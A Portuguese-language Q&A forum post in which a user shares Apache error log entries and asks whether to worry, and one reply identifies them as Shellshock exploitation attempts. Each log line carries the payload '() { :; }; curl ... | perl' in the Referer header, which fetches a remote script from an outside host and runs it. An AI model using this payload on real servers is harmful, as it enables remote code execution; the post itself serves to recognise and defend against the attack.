Solicitação estranha de HTTP no Apache Logs

2

Eu descobri algumas solicitações HTTP estranhas em meus logs do Apache, mas não tenho certeza se devo estar preocupado com elas ou não?

[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bizdb1-search.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bigconf.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bbs_forum.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/BBS, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl

Alguma idéia?

    
por Karl 03.11.2014 / 13:07

1 resposta

2

Este é o ShellShock, o ataque / exploração de vulnerabilidades do bash. Mais detalhes e como verificar se você está vulnerável são fornecidos, por exemplo, aqui: link .

    
por 03.11.2014 / 13:29